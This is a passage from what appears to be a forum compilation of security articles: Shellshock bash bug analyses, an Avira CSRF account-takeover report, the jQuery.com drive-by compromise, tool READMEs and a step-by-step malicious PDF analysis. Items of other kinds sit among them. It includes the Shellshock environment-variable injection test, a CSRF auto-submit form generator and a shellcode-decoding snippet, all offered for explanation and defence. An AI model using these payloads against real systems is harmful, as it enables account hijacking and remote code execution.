Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems of all sorts.

PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.
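The blacklisting idea mentioned above, dropping function-looking values before they reach a child shell, can be sketched in Python. This is a hypothetical mitigation sketch, not the official patch:

```python
MAGIC = "() {"  # bash's function-export marker

def scrub_environ(env):
    """Drop any variable whose value starts with bash's function-export
    marker before handing the environment to a child process."""
    return {k: v for k, v in env.items()
            if not v.lstrip().startswith(MAGIC)}

tainted = {
    "HTTP_COOKIE": "() { :; }; echo pwned",
    "HTTP_USER_AGENT": "Mozilla/5.0",
    "PATH": "/usr/bin:/bin",
}
print(scrub_environ(tainted))
```

A wrapper like this in front of popen()/system() call sites is crude (it also drops legitimate exported functions), which is exactly why a distinct namespace for function exports is the cleaner long-term answer.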
Sursa: lcamtuf's blog: Quick notes about the bash bug, its impact, and the fixes so far
-
Bash specially-crafted environment variables code injection attack
Posted on 2014/09/24 by Huzaifa Sidhpurwala

Bash, or the Bourne again shell, is a UNIX-like shell which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal-based command interpreter to many other fancy uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run the bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), to provide a parser for CGI scripts (Apache, etc) or even to provide limited command execution support (git, etc).

Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example:

- ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
- Apache servers using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, by system/exec in PHP (when run in CGI mode), and by open/system in Perl if a shell is used (which depends on the command string). PHP scripts executed with mod_php are not affected even if they spawn subshells.
- DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
- Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set or influenced by the user, which would allow arbitrary commands to be run.
- Any other application which is hooked onto a shell or runs a shell script using bash as the interpreter.

Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.

Like "real" programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

We believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way described above, but doing so should be considered a bad programming practice.

Red Hat has issued security advisories that fix this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fix this issue.
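The test string shown above is easy to wrap into a small checker. This sketch assumes bash is on PATH; on anything patched since September 2014 it should report False:

```python
import subprocess

def check_shellshock():
    """Run the canonical CVE-2014-6271 test and report whether the local
    bash executed the trailing injected command."""
    out = subprocess.run(
        ["bash", "-c", "echo this is a test"],
        env={"x": "() { :;}; echo vulnerable", "PATH": "/usr/bin:/bin"},
        capture_output=True, text=True,
    )
    # A patched bash may print a warning on stderr; only stdout matters here.
    return "vulnerable" in out.stdout

print("vulnerable:", check_shellshock())
```

The requested command runs either way; the checker only looks for the extra output injected via the environment variable.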
We have additional information regarding specific Red Hat products affected by this issue, which can be found at https://access.redhat.com/site/solutions/1207723. Information on CentOS can be found at [CentOS] Critical update for bash released today.

Sursa: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
-
Bash-ing Into Your Network – Investigating CVE-2014-6271
Posted by Jen Ellis in Information Security on Sep 25, 2014 3:34:35 AM

By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It's rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

Should I panic?

The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network, and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process.

What is vulnerable?

This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied.
So far, the Metasploit team has been focusing on the web-based vectors, since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash.

Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise). There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue.

Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices, are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post.
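Whether the system()/popen() vector applies on a given box comes down to what /bin/sh really is. A quick, Linux-centric check can be sketched as:

```python
import os

def default_sh(path="/bin/sh"):
    """Report what /bin/sh ultimately resolves to. 'bash' means the
    system()/popen() vector applies; dash, ash, busybox and friends do not
    import function definitions from the environment and are unaffected.
    Returns None if the path does not exist (e.g., on Windows)."""
    if not os.path.exists(path):
        return None
    return os.path.basename(os.path.realpath(path))

print("/bin/sh resolves to:", default_sh())
```

On Red Hat-style systems this typically prints "bash"; on Debian and Ubuntu it prints "dash", which is why identical web applications can differ in exposure.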
Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today.

The two most likely situations where this vulnerability will be exploited in the wild:

- Diagnostic CGI scripts that are written in Bash, or call out to system() where Bash is the default shell
- PHP applications running in CGI mode that call out to system(), where Bash is the default shell

Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to exploit it are fairly uncommon for remote exploitation.

Is it as bad as Heartbleed?

There has been a great deal of debate on this in the community, and we're not keen to jump on the "Heartbleed 2.0" bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information, as with Heartbleed, but also to take over the device or system and execute code remotely.

From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks.

BUT – and that's a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to test for conclusively, and its impact was way more widespread.
How can you protect yourself?

The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though the fix for CVE-2014-6271 is not complete, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example, systems that are End-of-Life), it's critical that they are protected behind a firewall. A big one. And test whether that firewall is secure.

What can we do to help?

Rapid7's Nexpose and Metasploit products have been updated to assist with the detection and verification of these issues. Nexpose has been updated to check for CVE-2014-6271 via credentialed scans and will be updated again soon to cover the new packages released for CVE-2014-7169. Metasploit added a module to the framework a few hours ago and it will become available in both Metasploit Community and Metasploit Pro in our weekly update. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. If you would like some advice on how to handle this situation, our Services team can help.

Are Rapid7's solutions affected?

Based on our current investigation, we are confident that our solutions are not impacted by this vulnerability in any way that could affect our customers and users. If we become aware of any further possibilities for exploitation, we'll update this blog to keep you informed.

Sursa: https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
-
[h=1]Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever[/h]

So Scorpion debuted last night on CBS, bringing us the thrilling tale of "geniuses" who help DHS by setting up wifi access points in restaurants. Yes, that is a true plot point. It all leads to this scene, whose true meaning I will unfold for you so that you can appreciate the full amazing awfulness.

https://www.youtube.com/watch?v=igxrvISaY4E

All you need to know about the main character is that he's a genius who is "on software," which means he tells people things like "open your email and click the link." He has trouble communicating his emotions because he's a geek who only understands machines, and he has a dusty warehouse space that's shared by a tough hardware expert, a hat-wearing psychology master, and a nerdy "human calculator."

This week, the DHS brings him an emergency! There is a bug in the local airport's software and now 200 planes are going to crash if he doesn't do something! So he decides that the best thing to do is reboot from a backup version (yes, that is the ACTUAL SUPER ELITE HIGH TECH THING HE'S DOING). But where is the backup? Ohhhh, it turns out EVERY PLANE has it, and if only they could download it from one of the planes, everybody could land and nobody would crash. The only way to get that backup, though, is USING AN ETHERNET CABLE DANGLED OUT OF THE BOTTOM OF THE PLANE AND PLUGGED INTO HIS LAPTOP.

Oh I know, I know — you think that's ridiculous, right? But it's not! Because they ALREADY TRIED A WIFI CONNECTION and it didn't work. So obviously the next thing is the ethernet cable. Also, the best way to do all this is to fly the plane low over the car that is racing ON THE LANDING STRIP.
No, don't LAND THE DAMN PLANE on said strip and then reboot from the plane's backup (note that I am not even getting into the sheer dumbfoundery of the notion that the planes all have a backup of the software, or that the entire airport is run on "a piece of software," or that you can't land without software EVEN THOUGH WE ACTUALLY INVENTED PLANES BEFORE WE INVENTED COMPUTERS).

Oh, and also? At one point, we see that all the computers are running VMware. Which — did VMware pay for product placement? Did Scorpion hire somebody with a job title like "cybersecurity ninja" from VMware to advise them? We may never know.

So anyway, the guy gets some random chick from the diner where he installed some wifi to drive with him in his car and hook up the ethernet cable and save the airport. Yay! Airport rebooted! Hacker triumph! Next week, the geniuses will help a guy whose pants keep falling down.

I apologize for all the caps but I had a lot of feels.

Sursa: Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever
-
Google's latest object recognition tech can spot everything in your living room
by Jon Fingas | @jonfingas | September 8th 2014 at 4:38 am

Automatic object recognition in images is currently tricky. Even if a computer has the help of smart algorithms and human assistants, it may not catch everything in a given scene. Google might change that soon, though; it just detailed a new detection system that can easily spot lots of objects in a scene, even if they're partly obscured. The key is a neural network that can rapidly refine the criteria it's looking for without requiring a lot of extra computing power. The result is a far deeper scanning system that can both identify more objects and make better guesses -- it can spot tons of items in a living room, including (according to Google's odd example) a flying cat.

The technology is still young, but the internet giant sees its recognition breakthrough helping everything from image searches through to self-driving cars. Don't be surprised if it gets much easier to look for things online using only the vaguest of terms.

Sursa: Google's latest object recognition tech can spot everything in your living room
-
It boosts the post count and puts new content on Google: SEO. That way, when people search Google for "salut", they'll land on RST and learn how to say hello.
-
A quick fix is already available. apt-get update / yum update, and whatever else you like.
-
##########################################################################
################################# Androguard #############################
##########################################################################
################### http://code.google.com/p/androguard ##################
######################## dev (at) androguard.re ##########################
##########################################################################

1 -] About

Androguard (Android Guard) is primarily a tool written entirely in Python to play with:
- DEX, ODEX
- APK
- Android's binary xml

2 -] Usage

You need to follow the following information to install dependencies for androguard:
http://code.google.com/p/androguard/wiki/Installation

You must go to the website to see more examples:
http://code.google.com/p/androguard/wiki/Usage

2.1 --] API

2.1.1 --] Instructions
http://code.google.com/p/androguard/wiki/Instructions

2.2 --] Demos

See the source code in the directory 'demos'.

2.3 --] Tools
http://code.google.com/p/androguard/wiki/Usage

2.4 --] Disassembler
http://code.google.com/p/androguard/wiki/Disassembler

2.5 --] Analysis
http://code.google.com/p/androguard/wiki/Analysis

2.6 --] Visualization
http://code.google.com/p/androguard/wiki/Visualization

2.7 --] Similarities, Diffing, plagiarism/rip-off indicator
http://code.google.com/p/androguard/wiki/Similarity
http://code.google.com/p/androguard/wiki/DetectingApplications

2.8 --] Open Source database of android malwares
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares

2.9 --] Decompiler

2.10 --] Reverse
http://code.google.com/p/androguard/wiki/RE

3 -] Roadmap/Issues
http://code.google.com/p/androguard/wiki/RoadMap
http://code.google.com/p/androguard/wiki/Issues

4 -] Authors: Androguard Team

Androguard + tools: Anthony Desnos <desnos at t0t0.fr>
DAD (DAD is A Decompiler): Geoffroy Gueguen <geoffroy dot gueguen at gmail dot com>

5 -] Contributors

Craig Smith <agent dot craig at gmail dot com>: 64 bits patch + magic tricks

6 -] Licenses

6.1 --] Androguard

Copyright © 2012, Anthony Desnos <desnos at t0t0.fr>
All rights reserved.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

6.2 --] DAD

Copyright © 2012, Geoffroy Gueguen <geoffroy.gueguen@gmail.com>
All rights reserved.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Sursa: https://github.com/androguard/androguard
-
Avira – Critical CSRF flaw Vulnerability puts millions of users at risk
by Pierluigi Paganini on September 20th, 2014

An Egyptian bug hunter discovered that the Avira website is affected by a CSRF flaw that allows attackers to hijack users' accounts and access their online backups.

What would you think if I told you that an antivirus could represent a menace for your system? An antivirus, like any other kind of software, could be exploited by threat actors to compromise the machine, as already explained in my previous post. The popular antivirus software Avira, which includes a Secure Backup service, is vulnerable to a critical web application vulnerability that could allow an attacker to take over the user's account.

The Egyptian 16-year-old expert Mazen Gamal reported to The Hacker News that the Avira website is affected by a CSRF (Cross-site request forgery) vulnerability that allows an attacker to hijack users' accounts and access their online secure cloud backup files. The CSRF vulnerability potentially puts millions of Avira users' accounts at risk.

CSRF forces an end user to execute unwanted actions on a web application in which he is authenticated. In a typical attack scheme, the attacker sends a link via email or through a social media platform, or shares a specially crafted HTML exploit page, to trick the victim into executing actions of the attacker's choosing. In this specific case, an attacker could use a CSRF exploit to trick a victim into accessing a malicious link that contains requests which will replace the victim's email ID on the Avira account with the attacker's email ID.

With this CSRF attack, the victim's account can easily be compromised: by replacing the email address, the attacker can reset the password of the victim's account via the forgotten-password procedure, because Avira will send the password reset link to the attacker's email ID instead of the victim's.
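The general shape of such a CSRF page, an auto-submitting hidden form that rides the victim's authenticated session, can be sketched as follows. The endpoint and field names are hypothetical, not Avira's actual ones:

```python
def csrf_poc(action_url, fields):
    """Build a hidden auto-submitting form. The browser attaches the
    victim's session cookies to the forged request automatically."""
    inputs = "".join(
        '<input type="hidden" name="%s" value="%s">' % (name, value)
        for name, value in fields.items())
    return ('<form id="csrf" action="%s" method="POST">%s</form>'
            '<script>document.getElementById("csrf").submit();</script>'
            % (action_url, inputs))

# Hypothetical email-change endpoint and field, for illustration only.
page = csrf_poc("https://example.com/account/change-email",
                {"email": "attacker@example.com"})
print(page)
```

The standard defense is a per-session anti-CSRF token in every state-changing form, which a page like this cannot guess.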
Once he has gained access to the victim's account, the attacker is able to retrieve the victim's online backup, which includes files the user has stored with the Online Backup software (https://dav.backup.avira.com/).

"I found a CSRF vulnerability in Avira [that] can lead me to full account takeover of any Avira user account," Gamal said via an email to The Hacker News. "The impact of the account takeover allowed me to open the backup files of the victim and also view the license codes for the affected user."

Gamal also provided a proof-of-concept video to demonstrate his discovery.

Gamal reported the vulnerability to the Avira Security Team on August 21st; the team admitted the flaw and fixed the CSRF bug on their website. However, the secure online backup service remains exposed until Avira offers an offline password layer for decrypting files locally.

Mazen Gamal has been recognized as an official bug hunter by Avira.

Pierluigi Paganini (Security Affairs – AVIRA, CSRF)

Sursa: Avira - Critical CSRF flaw Vulnerability puts millions users at risk | Security Affairs
-
Official jQuery Website Abused in Drive-by Download Attack
By Eduard Kovacs on September 23, 2014

The official website for the popular JavaScript library jQuery (jquery.com) has been compromised and abused by cybercriminals to distribute information-stealing malware, RiskIQ has reported.

Roughly 70 percent of the world's top 10,000 websites rely on jQuery for dynamic content, and because most jQuery users are website and systems administrators who maintain elevated privileges within their networks, it's possible that this attack is part of an operation whose goal is to compromise the systems of major organizations, RiskIQ said.

"Typically, these individuals have privileged access to web properties, backend systems and other critical infrastructure. Planting malware capable of stealing credentials on devices owned by privilege accounts holders inside companies could allow attackers to silently compromise enterprise systems, similar to what happened in the infamous Target breach," James Pleger, RiskIQ Director of Research, explained in a blog post.

According to the security firm, the jQuery library itself doesn't appear to be affected by the attack. However, the attackers planted an invisible iframe on the jQuery website to redirect its visitors to another site hosting the RIG exploit kit.

The RIG exploit kit was recently seen in several malvertising campaigns. The exploit kit is often used to deliver banking Trojans and other information-stealing malware. Last week, Avast researchers reported spotting a RIG attack in which the Tinba banking malware was the payload.

After consulting with researchers at Dell, RiskIQ determined that the malware being served in this particular attack is Andromeda, Pleger told SecurityWeek. While RIG includes exploits for several vulnerabilities, Pleger said they directly observed Microsoft Silverlight exploits being used.
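The injected redirector described above is a classic invisible iframe. A crude detector for that pattern can be sketched with a regular expression; real drive-by analysis is far more involved, and this only flags the obvious zero-size/display:none case:

```python
import re

# Match iframes that are zero-sized or hidden via inline CSS and capture
# their src URL. Attribute order is assumed for this simple sketch.
IFRAME_RE = re.compile(
    r'<iframe[^>]*(?:width="?0|height="?0|display:\s*none)[^>]*src="([^"]+)"',
    re.IGNORECASE)

def find_hidden_iframes(html):
    """Return src URLs of iframes that look intentionally invisible."""
    return IFRAME_RE.findall(html)

sample = ('<p>hello</p>'
          '<iframe width="0" height="0" src="http://jquery-cdn.com/x.html">'
          '</iframe>')
print(find_hidden_iframes(sample))
```

A visible iframe with a plain src produces no match, so a scanner built on this would only surface the suspicious cases for manual review.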
The redirector domain utilized in the attack (jquery-cdn[.]com) is hosted in Russia and it was registered on September 18, the day on which the attack started. Fortunately, the administrators of jQuery.com removed the malicious code, but the redirector domain is still online as of September 23. The attack affected companies in various sectors, including banking, technology and defense, Pleger said via email. While RiskIQ hasn't been able to track down all the victims of this campaign, the security firm has notified all the companies it has identified as being attacked. Sursa: Official jQuery Website Abused in Drive-by Download Attack | SecurityWeek.Com
-
How'd that malware get there? That's the question you've got to answer for every OS X malware infection. We built OSXCollector to make that easy. Quickly parse its output to get an answer. A typical infection might follow a path like: a phishing email leads to a malicious download; once installed, the initial payload establishes persistence; then it reaches out on the network and pulls down additional payloads. With the output of OSXCollector we can quickly correlate between browser history, startup items, downloads, and installed applications. It makes it easy to root-cause an infection, collect IOCs, and get to the bottom of it. So what does it do? OSXCollector gathers information from plists, SQLite databases, and the local filesystem to get the information needed to analyze a malware infection. The output is JSON, which makes it easy to process further with other tools. Usage The tool is self-contained in one script file, osxcollector.py. Launch OSXCollector as root or it will be unable to read data from all accounts: $ sudo ./osxcollector.py Before running the tool make sure that your web browsers (Safari, Chrome or Firefox) are closed. Otherwise OSXCollector will not be able to access their diagnostic files for collecting the data. Sursa: https://github.com/Yelp/osxcollector
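As a quick, hypothetical illustration of consuming the JSON-lines output described above, here is a sketch that groups records by section. Note the field name "osxcollector_section" and the sample records are assumptions made for illustration; check the real OSXCollector output for the actual keys.

```python
import json
from collections import defaultdict

def group_by_section(lines, section_key="osxcollector_section"):
    """Group JSON-lines records by a section field.

    NOTE: the default field name is an assumption for illustration;
    verify it against the actual OSXCollector output.
    """
    sections = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        sections[record.get(section_key, "unknown")].append(record)
    return sections

# Fabricated records standing in for real output:
sample = [
    '{"osxcollector_section": "downloads", "file_path": "/Users/x/Downloads/evil.dmg"}',
    '{"osxcollector_section": "startup", "label": "com.evil.agent"}',
]
grouped = group_by_section(sample)
```

With the records bucketed per section, correlating downloads against startup items becomes a simple dictionary lookup.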
-
Malicious Documents – PDF Analysis in 5 steps Mass mailing or targeted campaigns that use common files to host or exploit code have been and remain a very popular vector of attack. In other words, a malicious PDF or MS Office document received via e-mail or opened through a browser plug-in. In regards to malicious PDF files, the security industry saw a significant increase of vulnerabilities after the second half of 2008, which might be related to Adobe Systems' release of the specifications, format structure and functionality of PDF files. Most enterprise network perimeters are protected and contain several security filters and mechanisms that block threats. However, a malicious PDF or MS Office document might be very successful at passing through firewalls, intrusion prevention systems, anti-spam, anti-virus and other security controls. Upon reaching the victim's mailbox, this attack vector will leverage social engineering techniques to lure the user into clicking/opening the document. Then, for example, if the user opens a malicious PDF file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap, causing it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability can be exploited without even opening the file, just by having the malicious file on the hard drive, as described by Didier Stevens. From a 100-foot view, a PDF file is composed of a header, body, cross-reference table and trailer. One key component is the body, which may contain all kinds of content-type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex, which means the same information can be encoded and obfuscated in many ways.
For example, within objects there are streams that can be used to store data of any type and size. These streams are compressed; the PDF standard supports several algorithms, called filters, including ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode and DCTDecode. PDF files can contain multimedia content and support JavaScript, and ActionScript through Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques, making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All these features and capabilities translate into a huge attack surface! From a security incident response perspective, knowing how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of file, an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore, it helps the team be better prepared to identify future security incidents and to contain, eradicate and recover from those threats. So which steps could an incident handler or malware analyst perform to analyze such files? In the case of malicious PDF files there are 5 steps. Using the REMnux distro, the steps are described by Lenny Zeltser as: Find and extract JavaScript Deobfuscate JavaScript Extract the shellcode Create a shellcode executable Analyze the shellcode and determine what it does. A summary of tools and techniques using REMnux to analyze malicious documents is given in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and illustrate an introduction to the tools and techniques, below is the analysis of a malicious PDF using these steps. The other day I received one of those emails that was part of a mass mailing campaign.
The email contained an attachment with a malicious PDF file that took advantage of the Adobe Reader JavaScript engine to exploit CVE-2013-2729. This vulnerability, found by Felipe Manzano, exploits an integer overflow in several versions of Adobe Reader when parsing BMP files compressed with RLE8 encoded in PDF forms. The file on VirusTotal was only detected by 6 of the 55 AV engines. Let's go through each of the steps to find information on the malicious PDF's key characteristics and capabilities. 1st Step – Find and extract JavaScript One technique is using Didier Stevens' suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is pdfid, which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contains some of these keywords. In this case the first observation shows the PDF file contains 6 objects and 2 streams. No JavaScript is mentioned, but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms, which might indicate it is malicious. Then, looking deeper, we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity, but in this case Object 2 is the /XFA element that references Object 1, which contains a compressed and rather suspicious stream. Following this indicator, pdf-parser.py allows us to show the contents of an object and pass the stream through one of the supported filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) via the --filter switch. The --raw switch shows the output in an easier-to-read form. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren't visible in the original PDF file.
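For the common /FlateDecode case, the --filter step above is essentially zlib decompression. A minimal sketch of what happens under the hood (the JavaScript payload here is fabricated for illustration):

```python
import zlib

# Stand-in for a stream object's payload: JavaScript compressed with
# /FlateDecode, which is plain zlib/deflate.
javascript = b"var sc = unescape('%u9090%u9090'); eval(payload);"
stream_data = zlib.compress(javascript)

# What pdf-parser.py's --filter switch effectively does for /FlateDecode:
decoded = zlib.decompress(stream_data)
```

The other filters (ASCIIHexDecode, ASCII85Decode, etc.) are just different encodings applied the same way, which is why the tool can chain them off the stream's declared /Filter entry.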
If this document is opened by a victim, the /XFA keyword will execute this malicious code. Another fast method to find out whether the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files that helps show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, and execute JavaScript and shellcodes. When running the malicious PDF file against the latest version of the tool, it shows very useful information about the PDF structure and its contents, and can even detect which vulnerability the file triggers in case it has a signature for it. 2nd Step – Deobfuscate JavaScript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. In this case quite some manual cleanup of the extracted code was needed just to get the code isolated. The object.raw file contained 4 JavaScript elements between <script xxxx contentType="application/x-javascript"> tags and 1 image in base64 format in an <image> tag. This JavaScript code between tags needs to be extracted and placed into a separate file. The same can be done for the chunk of base64 data, which, when decoded, produces a 67MB BMP file. The JavaScript in this case was rather cryptic, but there are tools and techniques that help do the job of interpreting and executing the code. In this case I used another tool called js-didier.pl, which is Didier Stevens' version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows running and analyzing malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and print the results into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup, but it was enough to produce several eval log files with interesting results.
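One obfuscation layer you often meet at this stage stores the real payload as an array of character codes passed to String.fromCharCode(). Once the array is isolated, it can be decoded outside the browser; a sketch with a made-up array standing in for real data:

```python
# Hypothetical obfuscation layer: the script rebuilds its payload from
# character codes, e.g. String.fromCharCode(104, 116, 116, ...).
char_codes = [104, 116, 116, 112, 58, 47, 47]  # illustrative, not real data

# The Python equivalent of String.fromCharCode over the whole array:
decoded = "".join(chr(c) for c in char_codes)
```

Decoding layers like this one by hand is often faster than coaxing an interpreter through every eval, especially when the script mixes in anti-analysis checks.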
3rd Step – Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. The file, among other things, contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode; typically you find shellcode in JavaScript encoded in this way. These Unicode-encoded strings need to be converted into binary. To perform this, isolate the Unicode-encoded strings into a separate file and convert the Unicode (\u) notation to hex (\x) notation. This is done with a series of Perl regular expressions using a REMnux script called unicode2hex-escaped. The resulting file will contain the shellcode in a hex format ("\xeb\x06\x00\x00..") that will be used in the next step to convert it into a binary. 4th Step – Create a shellcode executable Next, with the shellcode encoded in hexadecimal format, we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states, "The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its execution. This approach is useful for analyzing shellcode that's difficult to understand without stepping through it with a debugger." 5th Step – Analyze shellcode and determine what it does. The final step is to determine what the shellcode does. To analyze the shellcode you could use a disassembler or a debugger. In this case a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. It further shows a URL pointing to an executable that will be downloaded if this shellcode gets executed. We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the networks.
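Going back to the 3rd step, the \u-to-\x conversion that unicode2hex-escaped performs can be sketched in Python. Each \uXXXX token is a 16-bit value stored little-endian, so the low byte comes out first (the sample escapes below are illustrative, not the real shellcode):

```python
import re
import struct

def unicode_escaped_to_bytes(s):
    """Convert shellcode written as \\uXXXX escapes into raw bytes.

    Each \\uXXXX token is a 16-bit little-endian word, so \\u9090\\ueb06
    becomes the bytes 90 90 06 eb.
    """
    words = [int(m, 16) for m in re.findall(r"\\u([0-9a-fA-F]{4})", s)]
    return b"".join(struct.pack("<H", w) for w in words)

# Illustrative input; real samples are hundreds of escapes long.
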